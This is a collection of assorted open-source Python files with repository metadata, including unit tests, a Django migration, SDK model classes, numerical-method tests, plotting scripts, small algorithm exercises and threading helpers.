    return RenderedWarContent(digest)
def rules():
    """Register this module's rules and the `package` union membership."""
    return (
        *collect_rules(),
        UnionRule(PackageFieldSet, PackageWarFileFieldSet),
    )
| [
"noreply@github.com"
] | pantsbuild.noreply@github.com |
fe2f7f2530cf752e62798071f21f4b0661893d06 | 15a992391375efd487b6442daf4e9dd963167379 | /tests/test_simulatedelay.py | 3a0507dae745ed25ed225fcb317707121dba18bb | [
"Apache-2.0"
] | permissive | Bala93/MONAI | b0e68e1b513adcd20eab5158d4a0e5c56347a2cd | e0a7eff5066da307a73df9145077f6f1fec7a514 | refs/heads/master | 2022-08-22T18:01:25.892982 | 2022-08-12T18:13:53 | 2022-08-12T18:13:53 | 259,398,958 | 2 | 0 | null | 2020-04-27T17:09:12 | 2020-04-27T17:09:11 | null | UTF-8 | Python | false | false | 1,251 | py | # Copyright (c) MONAI Consortium
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import time
import unittest
import numpy as np
from parameterized import parameterized
from monai.transforms.utility.array import SimulateDelay
from tests.utils import NumpyImageTestCase2D
class TestSimulateDelay(NumpyImageTestCase2D):
    """Checks that SimulateDelay blocks for roughly the configured time."""
    @parameterized.expand([(0.45,), (1,)])
    def test_value(self, delay_test_time: float):
        resize = SimulateDelay(delay_time=delay_test_time)
        start: float = time.time()
        _ = resize(self.imt[0])
        stop: float = time.time()
        measured_approximate: float = stop - start
        # Wall-clock timing is noisy, hence the wide rtol=0.5 tolerance.
        np.testing.assert_allclose(delay_test_time, measured_approximate, rtol=0.5)
if __name__ == "__main__":
unittest.main()
| [
"noreply@github.com"
] | Bala93.noreply@github.com |
03d4ba232b4d34b7e9a72471e1ff44e5c604831f | ce76b3ef70b885d7c354b6ddb8447d111548e0f1 | /man_and_new_group/different_group_or_little_hand.py | 152d6b704e1cb5dd4be2d6ff23ee40a673ea85fe | [] | no_license | JingkaiTang/github-play | 9bdca4115eee94a7b5e4ae9d3d6052514729ff21 | 51b550425a91a97480714fe9bc63cb5112f6f729 | refs/heads/master | 2021-01-20T20:18:21.249162 | 2016-08-19T07:20:12 | 2016-08-19T07:20:12 | 60,834,519 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 207 | py |
#! /usr/bin/env python
def day_and_small_way(str_arg):
    # Echo the argument to stdout.
    print(str_arg)
def company(str_arg):
    # Print the argument, then the fixed follow-up line.
    day_and_small_way(str_arg)
    print('get_new_fact')
if __name__ == '__main__':
company('company')
| [
"jingkaitang@gmail.com"
] | jingkaitang@gmail.com |
ad9064e708a629da144f757f5219de9f0fe28990 | 81e6391b9db249296ec84f6524093cf41b581f31 | /단계별로 풀어보기/18. 큐, 덱/[11866] 요세푸스 문제 0.py | 036703aae87a0030be4e80cef574bbad953c51d2 | [] | no_license | jaeehooon/baekjoon_python | e991be4b510d642f72f625b898d20451dc920d7c | 295776309a883338bfbf51c33caf6dc6629493ca | refs/heads/master | 2023-04-15T14:22:21.281930 | 2021-04-26T02:15:09 | 2021-04-26T02:15:09 | 294,137,750 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 580 | py | import sys
from collections import deque
class MyDeque(object):
    """Circle of people numbered 1..size for the Josephus elimination game."""
    def __init__(self, size):
        # People sit in clockwise order 1, 2, ..., size.
        self.dq = deque(range(1, size + 1))
    def remove(self, kth):
        """Count off ``kth`` people; remove and return the one counted last.

        Raises IndexError when the circle is already empty.
        """
        # rotate(-(kth-1)) brings the kth person to the front in one C-level
        # call, replacing the manual popleft/append loop.
        self.dq.rotate(-(kth - 1))
        return self.dq.popleft()
    def size(self):
        """Number of people still in the circle."""
        return len(self.dq)
if __name__ == '__main__':
    # N = number of people in the circle, K = count-off step.
    N, K = map(int, sys.stdin.readline().split())
    result = list()
    dq = MyDeque(N)
    while dq.size() != 0:
        result.append(dq.remove(K))
    # Required output format is <a, b, c>, so swap the list brackets.
    print(str(result).replace("[", '<').replace("]", ">"))
| [
"qlenfr0922@gmail.com"
] | qlenfr0922@gmail.com |
d4d9d009198e4aa20e9f0cf82447cf8d32471e26 | 0fe11fbe31be719a253c0b2d9e41e20fedc2c40f | /dapper/mods/LorenzUV/illust_LorenzUV.py | 212f07e00e12c2a3c7334ea3bcc7de4151b5083c | [
"MIT"
] | permissive | lijunde/DAPPER | 148ff5cefb92d1bb01c78bd4a82a6f1ecdebdad2 | dc92a7339932af059967bd9cf0a473ae9b8d7bf9 | refs/heads/master | 2020-12-10T21:44:54.468785 | 2019-09-24T18:18:36 | 2019-09-24T18:18:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,078 | py | # Quick illustration.
# Sorry for the mess.
from dapper import *
from matplotlib import cm
# Setup
sd0 = seed(4)
# from dapper.mods.LorenzUV.wilks05 import LUV
from dapper.mods.LorenzUV.lorenz95 import LUV
nU, J = LUV.nU, LUV.J
dt = 0.005
t0 = np.nan
K = int(10/dt)
step_1 = with_rk4(LUV.dxdt,autonom=True)
step_K = with_recursion(step_1,prog=1)
x0 = 0.01*randn(LUV.M)
x0 = step_K(x0,int(2/dt),t0,dt)[-1] # BurnIn
xx = step_K(x0,K ,t0,dt)
# Grab parts of state vector
ii = arange(nU+1)
jj = arange(nU*J+1)
circU = np.mod(ii ,nU)
circV = np.mod(jj,nU*J) + nU
iU = np.hstack([0, 0.5+arange(nU), nU])
def Ui(xx):
interp = (xx[0]+xx[-1])/2
return np.hstack([interp, xx, interp])
# Overlay linear
fg = plt.figure(2)
fg.clear()
ax = fg.gca()
L = 20 # Num of lines to plot
start = int(3e5*dt)
step = 3
for i,Ny in enumerate(range(L)):
k = start + Ny*step
c = cm.viridis(1-Ny/L)
a = 0.8-0.2*Ny/L
plt.plot(iU ,Ui(xx[k][:nU]),color=c,lw=2 ,alpha=a)[0]
if i%2==0:
plt.plot(jj/J,xx[k][circV] ,color=c,lw=0.7,alpha=a)[0]
# Make ticks, ticklabels, grid
ax.set_xticks([])
ym,yM = -4,10
ax.set_ylim(ym,yM)
ax.set_xlim(0,nU)
dY = 4 # SET TO: 1 for wilks05, 4 for lorenz95
# U-vars: major
tU = iU[1:-1]
lU = np.array([str(i+1) for i in range(nU)])
tU = ccat(tU[0],tU[dY-1::dY])
lU = ccat(lU[0],lU[dY-1::dY])
for t, l in zip(tU,lU):
ax.text(t,ym-.6,l,fontsize=mpl.rcParams['xtick.labelsize'],horizontalalignment='center')
ax.vlines(t, ym, -3.78, 'k',lw=mpl.rcParams['xtick.major.width'])
# V-vars: minor
tV = arange(nU+1)
lV = ['1'] + [str((i+1)*J) for i in circU]
for i, (t, l) in enumerate(zip(tV,lV)):
if i%dY==0:
ax.text(t,-5.0,l,fontsize=9,horizontalalignment='center')
ax.vlines(t,ym,yM,lw=0.3)
ax.vlines(t, ym, -3.9, 'k',lw=mpl.rcParams['xtick.minor.width'])
ax.grid(color='k',alpha=0.6,lw=0.4,axis='y',which='major')
# # Convert to circular coordinates
# # Should have used instead: projection='polar'
# def tU(zz):
# xx = (40 + 3*zz)*cos(2*pi*ii/nU)
# yy = (40 + 3*zz)*sin(2*pi*ii/nU)
# return xx,yy
# def tV(zz):
# xx = (80 + 15*zz)*cos(2*pi*jj/nU/J)
# yy = (80 + 15*zz)*sin(2*pi*jj/nU/J)
# return xx,yy
#
#
# # Animate circ
# plt.figure(3)
# lhU = plt.plot(*tU(xx[-1][circU]),'b',lw=3)[0]
# lhV = plt.plot(*tV(xx[-1][circV]),'g',lw=1)[0]
# for k in progbar(range(K),'Plotting'):
# dataU = tU(xx[k][circU])
# dataV = tV(xx[k][circV])
# lhU.set_xdata(dataU[0])
# lhU.set_ydata(dataU[1])
# lhV.set_xdata(dataV[0])
# lhV.set_ydata(dataV[1])
# plt.pause(0.001)
#
#
# # Overlay circ
# from matplotlib import cm
# fg = plt.figure(4)
# fg.clear()
# plt.plot(*tU(4.52*np.ones_like(circU)),color='k',lw=1)[0]
# plt.plot(*tV(0.15*np.ones_like(circV)),color='k',lw=1)[0]
# ax = fg.axes[0]
# ax.set_axis_off()
# ax.set_facecolor('white')
# ax.set_aspect('equal')
# L = 40 # Num of lines to plot
# for Ny in range(L):
# k = 143 + Ny*3
# c = cm.viridis(1-Ny/L)
# a = 0.8-0.2*Ny/L
# plt.plot(*tU(xx[k][circU]),color=c,lw=2,alpha=a)[0]
# plt.plot(*tV(xx[k][circV]),color=c,lw=1,alpha=a)[0]
| [
"patrick.n.raanes@gmail.com"
] | patrick.n.raanes@gmail.com |
ebc47b77e7121455d0580d51a74c276f7501266c | 3e19be3527431ba4949f1dc868158cf4f3ea92c5 | /rps_game/round.py | c5d4208b7de5bd1e5d4c006026c56fe26f079cca | [] | no_license | aldotele/rock_paper_scissors | f61626ba941181c0568045448686e5d14c11d9bb | 6562cd15921d6736705c6490f1614f7335f9c38e | refs/heads/main | 2023-06-13T00:43:10.425229 | 2021-07-06T09:40:15 | 2021-07-06T09:40:15 | 382,092,277 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 902 | py | class Round:
choices = {1: "Rock", 2: "Paper", 3: "Scissors"}
def __init__(self, player_1_choice, player_2_choice):
if Round.is_choice_valid(player_1_choice) and Round.is_choice_valid(player_2_choice):
self.player_1_choice = int(player_1_choice)
self.player_2_choice = int(player_2_choice)
self.winner = ""
else:
raise ValueError("choice must be an integer between 1 and 3")
@staticmethod
def is_choice_valid(choice_code):
try:
choice_code = int(choice_code)
if choice_code in Round.choices:
return True
else:
return False
except ValueError:
return False
@staticmethod
def show_options():
for code in Round.choices:
print(f"{code} - {Round.choices[code]}")
if __name__ == '__main__':
pass
| [
"aldo.telese@hotmail.it"
] | aldo.telese@hotmail.it |
28113d33d023705405400f808d2b609e2b69010e | de6ee907b82f52833d8e492e56ffebbd90528eed | /core/migrations/0001_initial.py | c1e82cd59dd68136aab1fdb5e967541ef268f0d1 | [] | no_license | ffabiorj/portfolio | 2c27e25f851790bef85912b07fb341111a117563 | a253742227776ff4d4d2d343cb87eba9599577e2 | refs/heads/master | 2021-06-03T04:24:50.879948 | 2020-04-19T01:44:45 | 2020-04-19T01:44:45 | 125,946,998 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 668 | py | # Generated by Django 3.0.5 on 2020-04-16 23:46
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Project',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=100)),
('description', models.TextField()),
('technology', models.CharField(max_length=20)),
('image', models.FilePathField(path='/img')),
],
),
]
| [
"fabio20rj@gmail.com"
] | fabio20rj@gmail.com |
cea59f25724bc06eaf721cb450fe61b141a9c80d | c733e6b433914a8faba256c7853f5cf2cd39c62a | /Python/Leetcode Daily Practice/DP/combination_sum.py | 6a9cf686a28a7a53a156eff82aed1ccf54c2b5a9 | [] | no_license | YaqianQi/Algorithm-and-Data-Structure | 3016bebcc1f1356b6e5f3c3e588f3d46c276a805 | 2e1751263f484709102f7f2caf18776a004c8230 | refs/heads/master | 2021-10-27T16:29:18.409235 | 2021-10-14T13:57:36 | 2021-10-14T13:57:36 | 178,946,803 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,304 | py | """
Input: {1, 2, 3, 7}, S=6
Output: True
The given set has a subset whose sum is '6': {1, 2, 3}
"""
# brute-force
# top-down with memo
# bottom up
def combination_sum_brute_force(num, sum_val):
# o(2**n)
def dfs(idx, sum_val):
if sum_val == 0:
return 1
if sum_val < 0 or idx >= len(num):
return -1
if num[idx] <= sum_val:
if dfs(idx + 1, sum_val - num[idx]) == 1:
return 1
return dfs(idx + 1, sum_val)
return dfs(0, sum_val)
def combination_sum_top_down_memo(num, sum_val):
# dp[num_idx][sum_val]
n = len(num)
dp = [[-1 for _ in range(sum_val+1)] for _ in range(n)]
def dfs(idx, sum_val):
if sum_val == 0:
return 1
if sum_val < 0 and idx >= len(num):
return -1
# print(idx, sum_val)
if dp[idx][sum_val] == -1:
if num[idx] <= sum_val:
if dfs(idx + 1, sum_val - num[idx]) == 1:
dp[idx][sum_val] = 1
return 1
else:
dp[idx][sum_val] = dfs(idx + 1, sum_val)
return dp[idx][sum_val]
return dfs(0, sum_val)
def combination_sum_bottom_up(num, sum_val):
# dp[num_idx][sum_val]
m = len(num)
n = sum_val + 1
dp = [[False for x in range(sum_val+1)] for y in range(len(num))]
# populate the sum = 0 columns, as we can always form '0' sum with an empty set
for i in range(0, len(num)):
dp[i][0] = True
# with only one number, we can form a subset only when the required sum is
# equal to its value
for s in range(1, sum_val+1):
dp[0][s] = True if num[0] == s else False
for i in range(1, m):
for j in range(1, n):
if dp[i-1][j]:
dp[i][j] = dp[i-1][j]
elif num[i] <= j:
dp[i][j] = dp[i-1][j - num[i]]
return dp[-1][-1]
def combination_sum_optimize_bottom_up(num, sum_val):
dp = [0] * (sum_val + 1)
dp[0] = 1
for i in range(len(num)):
for j in range(1, sum_val + 1):
if dp[j]:
continue
elif num[i] <= j:
dp[j] = dp[j-num[i]]
return dp[-1]
print(combination_sum_optimize_bottom_up([1,2,3,7], 6))
| [
"alicia.qyq@gmail.com"
] | alicia.qyq@gmail.com |
62f3947d4ae61f1cc720aa085837534f53774018 | e1b8fb9a5500516f28d3d7e9a5f259c49ef35f14 | /top/api/rest/InventoryAdjustTradeRequest.py | 4da3e858af12147c95f9d7d992b46d0d33f834f9 | [] | no_license | htom78/taobao_comet_py | 9224dbca1a413a54bcc5569873e4c7a9fc9ba059 | ad8b2e983a14d3ab7665244449f79dd72f390815 | refs/heads/master | 2020-05-17T10:47:28.369191 | 2013-08-27T08:50:59 | 2013-08-27T08:50:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 406 | py | '''
Created by auto_sdk on 2013-06-16 16:36:02
'''
from top.api.base import RestApi
class InventoryAdjustTradeRequest(RestApi):
def __init__(self,domain='gw.api.taobao.com',port=80):
RestApi.__init__(self,domain, port)
self.biz_unique_code = None
self.items = None
self.operate_time = None
self.tb_order_type = None
def getapiname(self):
return 'taobao.inventory.adjust.trade'
| [
"tomhu@ekupeng.com"
] | tomhu@ekupeng.com |
6fd38298e6c06da5b7a9c85a6acb9e33eaaa8531 | e4ec5b6cf3cfe2568ef0b5654c019e398b4ecc67 | /azure-cli/2.0.18/libexec/lib/python3.6/site-packages/azure/mgmt/network/v2016_12_01/models/flow_log_information.py | ad2b8721b840a00057bc3671a586e0b6b65dddb0 | [] | no_license | EnjoyLifeFund/macHighSierra-cellars | 59051e496ed0e68d14e0d5d91367a2c92c95e1fb | 49a477d42f081e52f4c5bdd39535156a2df52d09 | refs/heads/master | 2022-12-25T19:28:29.992466 | 2017-10-10T13:00:08 | 2017-10-10T13:00:08 | 96,081,471 | 3 | 1 | null | 2022-12-17T02:26:21 | 2017-07-03T07:17:34 | null | UTF-8 | Python | false | false | 1,856 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class FlowLogInformation(Model):
"""Information on the configuration of flow log.
:param target_resource_id: The ID of the resource to configure for flow
logging.
:type target_resource_id: str
:param storage_id: ID of the storage account which is used to store the
flow log.
:type storage_id: str
:param enabled: Flag to enable/disable flow logging.
:type enabled: bool
:param retention_policy:
:type retention_policy: :class:`RetentionPolicyParameters
<azure.mgmt.network.v2016_12_01.models.RetentionPolicyParameters>`
"""
_validation = {
'target_resource_id': {'required': True},
'storage_id': {'required': True},
'enabled': {'required': True},
}
_attribute_map = {
'target_resource_id': {'key': 'targetResourceId', 'type': 'str'},
'storage_id': {'key': 'properties.storageId', 'type': 'str'},
'enabled': {'key': 'properties.enabled', 'type': 'bool'},
'retention_policy': {'key': 'properties.retentionPolicy', 'type': 'RetentionPolicyParameters'},
}
def __init__(self, target_resource_id, storage_id, enabled, retention_policy=None):
self.target_resource_id = target_resource_id
self.storage_id = storage_id
self.enabled = enabled
self.retention_policy = retention_policy
| [
"Raliclo@gmail.com"
] | Raliclo@gmail.com |
97e33fe4f5d5aefa00b2158878f7bc01c15bd8ec | dc99adb79f15b3889a7ef6139cfe5dfc614889b8 | /Aplikace_1_0/Source/ewitis/data/db.py | 26dacf3f02ebbf16712e8a6bc349676538d6df44 | [] | no_license | meloun/ew_aplikace | 95d1e4063a149a10bb3a96f372691b5110c26b7b | f890c020ad8d3d224f796dab3f1f222c1f6ba0eb | refs/heads/master | 2023-04-28T06:43:12.252105 | 2023-04-18T19:59:36 | 2023-04-18T19:59:36 | 2,674,595 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 417 | py | '''
Created on 8.12.2013
@author: Meloun
'''
import libs.sqlite.sqlite as sqlite
#=======================================================================
# DATABASE
#=======================================================================
print "I: Database init"
try:
db = sqlite.sqlite_db("db/test_db.sqlite")
db.connect()
except:
print "E: Database"
| [
"lubos.melichar@gmail.com"
] | lubos.melichar@gmail.com |
7605014773f49f01d2f7d6e63c97b2e5e3735fd1 | da687718aa8ce62974090af63d25e057262e9dfe | /cap12-dicionarios/dicionarios_aninhados/inventario2.py | 16e00d7872c4b80f9ecb062d75e3ca72f267f1e7 | [] | no_license | frclasso/revisao_Python_modulo1 | 77928fa4409c97d49cc7deccdf291f44c337d290 | 1e83d0ef9657440db46a8e84b136ac5f9a7c556e | refs/heads/master | 2020-06-25T05:37:28.768343 | 2019-07-27T22:23:58 | 2019-07-27T22:23:58 | 199,217,969 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 360 | py | #!/usr/bin/env python3
inventory = {'Sword': {'attack': 5, 'defence': 1,
'weight':15, 'price': 2},
'Armor':{'attack':0, 'defence': 10,
'weight':25, 'price': 5}
}
for name, item in inventory.items():
print('{0}: {1[attack]} {1[defence]} {1[weight]} {1[price]}'.format(name, item))
| [
"frcalsso@yahoo.com.br"
] | frcalsso@yahoo.com.br |
ebb3dff07a902763e88bf53719711bec7c75ff06 | ae6c2a6fa37613ac31b2bd3537b3276c9b333632 | /search/migrations/0012_auto_20170822_1207.py | 576f43db2917f84833616caefcb3759c3b8b7f67 | [
"Apache-2.0"
] | permissive | salopensource/sal | 435a31904eb83048c02c9fbff02bbf832835d1b4 | 0895106c6729d5465da5e21a810e967a73ed6e24 | refs/heads/main | 2023-08-03T06:53:40.142752 | 2023-07-28T15:51:08 | 2023-07-28T15:51:08 | 35,883,375 | 227 | 94 | Apache-2.0 | 2023-07-28T15:51:10 | 2015-05-19T13:21:57 | Python | UTF-8 | Python | false | false | 451 | py | # Generated by Django 1.10 on 2017-08-22 19:07
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('search', '0011_auto_20170810_1205'),
]
operations = [
migrations.AlterField(
model_name='savedsearch',
name='name',
field=models.CharField(blank=True, max_length=100, null=True),
),
]
| [
"graham@grahamgilbert.com"
] | graham@grahamgilbert.com |
ca4adf24f6c210b339e3770daa1efd98e8b87ce2 | d5fbec8208b9a65032bdd2b550c7dde795d5661b | /kratos/tests/test_time_discretization.py | 34fec9075ad0f9577ad12f0fb7482af71a49a096 | [
"BSD-3-Clause"
] | permissive | Ginux1994/Kratos | 9dc5f7b5a427b0a258cd01fbd0bffae19571a81a | 2893e855a07e5cb3b0e6bc549c646fca4a525a99 | refs/heads/master | 2020-04-10T16:49:50.748887 | 2018-12-10T09:43:37 | 2018-12-10T09:43:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,588 | py | from __future__ import print_function, absolute_import, division
import KratosMultiphysics as KM
import KratosMultiphysics.KratosUnittest as KratosUnittest
class TestTimeDiscretization(KratosUnittest.TestCase):
def test_BDF1(self):
bdf = KM.BDF1()
delta_time = 0.11
coeffs = bdf.ComputeBDFCoefficients(delta_time)
self.assertEqual(len(coeffs), 2)
self.assertAlmostEqual(coeffs[0], 1.0/delta_time)
self.assertAlmostEqual(coeffs[1], -1.0/delta_time)
self.assertEqual(KM.GetMinimumBufferSize(bdf), 2)
def test_BDF2(self):
bdf = KM.BDF2()
delta_time = 0.11
prev_delta_time = 0.089
coeffs = bdf.ComputeBDFCoefficients(delta_time, prev_delta_time)
self.assertEqual(len(coeffs), 3)
rho = prev_delta_time / delta_time;
time_coeff = 1.0 / (delta_time * rho * rho + delta_time * rho);
self.assertAlmostEqual(coeffs[0], time_coeff * (rho * rho + 2.0 * rho))
self.assertAlmostEqual(coeffs[1], -time_coeff * (rho * rho + 2.0 * rho + 1.0))
self.assertAlmostEqual(coeffs[2], time_coeff)
self.assertEqual(KM.GetMinimumBufferSize(bdf), 3)
def test_BDF3(self):
bdf = KM.BDF3()
delta_time = 0.11
coeffs = bdf.ComputeBDFCoefficients(delta_time)
self.assertEqual(len(coeffs), 4)
self.assertAlmostEqual(coeffs[0], 11.0/(6.0*delta_time))
self.assertAlmostEqual(coeffs[1], -18.0/(6.0*delta_time))
self.assertAlmostEqual(coeffs[2], 9.0/(6.0*delta_time))
self.assertAlmostEqual(coeffs[3], -2.0/(6.0*delta_time))
self.assertEqual(KM.GetMinimumBufferSize(bdf), 4)
def test_BDF4(self):
bdf = KM.BDF4()
delta_time = 0.11
coeffs = bdf.ComputeBDFCoefficients(delta_time)
self.assertEqual(len(coeffs), 5)
self.assertAlmostEqual(coeffs[0], 25.0/(12.0*delta_time))
self.assertAlmostEqual(coeffs[1], -48.0/(12.0*delta_time))
self.assertAlmostEqual(coeffs[2], 36.0/(12.0*delta_time))
self.assertAlmostEqual(coeffs[3], -16.0/(12.0*delta_time))
self.assertAlmostEqual(coeffs[4], 3.0/(12.0*delta_time))
self.assertEqual(KM.GetMinimumBufferSize(bdf), 5)
def test_BDF5(self):
bdf = KM.BDF5()
delta_time = 0.11
coeffs = bdf.ComputeBDFCoefficients(delta_time)
self.assertEqual(len(coeffs), 6)
self.assertAlmostEqual(coeffs[0], 137.0/(60.0*delta_time))
self.assertAlmostEqual(coeffs[1], -300.0/(60.0*delta_time))
self.assertAlmostEqual(coeffs[2], 300.0/(60.0*delta_time))
self.assertAlmostEqual(coeffs[3], -200.0/(60.0*delta_time))
self.assertAlmostEqual(coeffs[4], 75.0/(60.0*delta_time))
self.assertAlmostEqual(coeffs[5], -12.0/(60.0*delta_time))
self.assertEqual(KM.GetMinimumBufferSize(bdf), 6)
def test_BDF6(self):
bdf = KM.BDF6()
delta_time = 0.11
coeffs = bdf.ComputeBDFCoefficients(delta_time)
self.assertEqual(len(coeffs), 7)
self.assertAlmostEqual(coeffs[0], 147.0/(60.0*delta_time))
self.assertAlmostEqual(coeffs[1], -360.0/(60.0*delta_time))
self.assertAlmostEqual(coeffs[2], 450.0/(60.0*delta_time))
self.assertAlmostEqual(coeffs[3], -400.0/(60.0*delta_time))
self.assertAlmostEqual(coeffs[4], 225.0/(60.0*delta_time))
self.assertAlmostEqual(coeffs[5], -72.0/(60.0*delta_time))
self.assertAlmostEqual(coeffs[6], 10.0/(60.0*delta_time))
self.assertEqual(KM.GetMinimumBufferSize(bdf), 7)
def test_Newmark(self):
gen_alpha = KM.Newmark()
self.assertAlmostEqual(gen_alpha.GetBeta(), 0.25)
self.assertAlmostEqual(gen_alpha.GetGamma(), 0.5)
self.assertEqual(KM.GetMinimumBufferSize(gen_alpha), 2)
def test_Bossak(self):
gen_alpha = KM.Bossak()
self.assertAlmostEqual(gen_alpha.GetBeta(), 0.2)
self.assertAlmostEqual(gen_alpha.GetGamma(), 0.1225)
self.assertAlmostEqual(gen_alpha.GetAlphaM(), -0.3)
self.assertEqual(KM.GetMinimumBufferSize(gen_alpha), 2)
def test_GeneralizedAlpha(self):
gen_alpha = KM.GeneralizedAlpha()
self.assertAlmostEqual(gen_alpha.GetBeta(), 0.2)
self.assertAlmostEqual(gen_alpha.GetGamma(), 0.1225)
self.assertAlmostEqual(gen_alpha.GetAlphaM(), -0.3)
self.assertAlmostEqual(gen_alpha.GetAlphaF(), 0.0)
self.assertEqual(KM.GetMinimumBufferSize(gen_alpha), 2)
if __name__ == '__main__':
KratosUnittest.main()
| [
"philipp.bucher@tum.de"
] | philipp.bucher@tum.de |
4def4a44ca4457ea04f4023ba49dae670040dc78 | bc183f7357cda3ad064f8c2ff34a176c406446d3 | /pastepwn/util/threadingutils.py | 54451a26289cd5ba3667d162722837819e9aadcf | [
"MIT"
] | permissive | luton1507/pastepwn | b8a790168ce08f10c62574eeb0a68f0dedd5425d | 9b2fee22857e54a5312fdb3d388b472a7d271c50 | refs/heads/master | 2022-11-10T20:18:40.102277 | 2020-06-19T23:34:14 | 2020-06-19T23:34:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,915 | py | # -*- coding: utf-8 -*-
import logging
from threading import Thread, current_thread
def start_thread(target, name, exception_event, *args, **kwargs):
"""
Starts a thread passed as argument and catches exceptions that happens during execution
:param target: Method to be executed in the thread
:param name: Name of the thread
:param exception_event: An event that will be set if an exception occurred
:param args: Arguments to be passed to the threaded method
:param kwargs: Keyword-Arguments to be passed to the threaded method
:return:
"""
thread = Thread(target=thread_wrapper, name=name, args=(target, exception_event) + args, kwargs=kwargs)
thread.start()
return thread
def thread_wrapper(target, exception_event, *args, **kwargs):
"""
Wrapper around the execution of a passed method, that catches and logs exceptions
:param target: Method to be executed
:param exception_event: An event that will be set if an exception occurred
:param args: Arguments to be passed to the target method
:param kwargs: Keyword-Arguments to be passed to the target method
:return:
"""
thread_name = current_thread().name
logger = logging.getLogger(__name__)
logger.debug('{0} - thread started'.format(thread_name))
try:
target(*args, **kwargs)
except Exception:
exception_event.set()
logger.exception('unhandled exception in %s', thread_name)
raise
logger.debug('{0} - thread ended'.format(thread_name))
def join_threads(threads):
"""
End all threads and join them back into the main thread
:param threads: List of threads to be joined
:return:
"""
logger = logging.getLogger(__name__)
for thread in threads:
logger.debug("Joining thread {0}".format(thread.name))
thread.join()
logger.debug("Thread {0} has ended".format(thread.name))
| [
"d-Rickyy-b@users.noreply.github.com"
] | d-Rickyy-b@users.noreply.github.com |
5955661160554d40102fc8a32fa5b056bbf75e99 | f0a4ba1f1f941092e68e4b1ef9cff0d3852199ef | /Do_it!/5.재귀 알고리즘/비재귀적 표현-재귀를제거.py | 5c4d998075cc37ef533ac96b4ff5819b45653e53 | [] | no_license | lsb530/Algorithm-Python | d41ddd3ca7675f6a69d322a4646d75801f0022b2 | a48c6df50567c9943b5d7218f874a5c0a85fcc6d | refs/heads/master | 2023-06-18T04:36:09.221769 | 2021-06-28T16:49:35 | 2021-06-28T16:49:35 | 367,775,760 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 594 | py | # 스택으로 재귀 함수 구현하기(재귀를 제거)
from stack import Stack # stack.py의 Stack 클래스를 임포트
def recur(n: int) -> int:
"""재귀를 제거한 recur() 함수"""
s = Stack(n)
while True:
if n > 0:
s.push(n) # n값을 푸시
n = n - 1
continue
if not s.is_empty(): # 스택이 비어있지 않으면
n = s.pop() # 저장한 값을 n에 팝
print(n)
n = n - 2
continue
break
x = int(input('정숫값을 입력하세요 : '))
recur(x)
| [
"lsb530@naver.com"
] | lsb530@naver.com |
437500d29d4bb52a2d7175702b3a9674cc625015 | 0562a138eaa1b460a6bf94f4a724b32a79186900 | /aat/common.py | 55e9be1071ca53160b581ef93e4a7e908cf04fc9 | [
"Apache-2.0"
] | permissive | sylinuxhy/aat | 15dc00bda32aed91aaad5c6122982114874342e4 | 8113365e6f0c307156d43c0dee594bf66ff8b4fa | refs/heads/main | 2023-01-28T06:49:58.646911 | 2020-12-05T01:31:15 | 2020-12-05T01:31:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,554 | py | import os
import itertools
import functools
import pandas as pd # type: ignore
@functools.lru_cache()
def _in_cpp():
_cpp = os.environ.get("AAT_USE_CPP", "").lower() in ("1", "on")
try:
from aat.binding import ( # type: ignore # noqa: F401
SideCpp,
EventTypeCpp,
DataTypeCpp,
InstrumentTypeCpp,
OrderTypeCpp,
OrderFlagCpp,
OrderBookCpp,
ExchangeTypeCpp,
InstrumentCpp,
DataCpp,
EventCpp,
OrderCpp,
TradeCpp,
)
except ImportError:
if _cpp:
# raise if being told to use c++
raise
return False
return _cpp
def id_generator():
__c = itertools.count()
def _gen_id():
return next(__c)
return _gen_id
def _merge(lst1, lst2, sum=True):
"""merge two lists of (val, datetime) and accumulate"""
df1 = pd.DataFrame(lst1, columns=("val1", "date1"))
df1.set_index("date1", inplace=True)
# df1.drop_duplicates(inplace=True)
df2 = pd.DataFrame(lst2, columns=("val2", "date2"))
df2.set_index("date2", inplace=True)
# df2.drop_duplicates(inplace=True)
df = df1.join(df2, how="outer")
# df = pd.concat([df1, df2], axis=1)
df.fillna(method="ffill", inplace=True)
df.fillna(0.0, inplace=True)
if sum:
df = df.sum(axis=1)
else:
df = df.mean(axis=1)
df = df.reset_index().values.tolist()
return [(b, a.to_pydatetime()) for a, b in df]
| [
"t.paine154@gmail.com"
] | t.paine154@gmail.com |
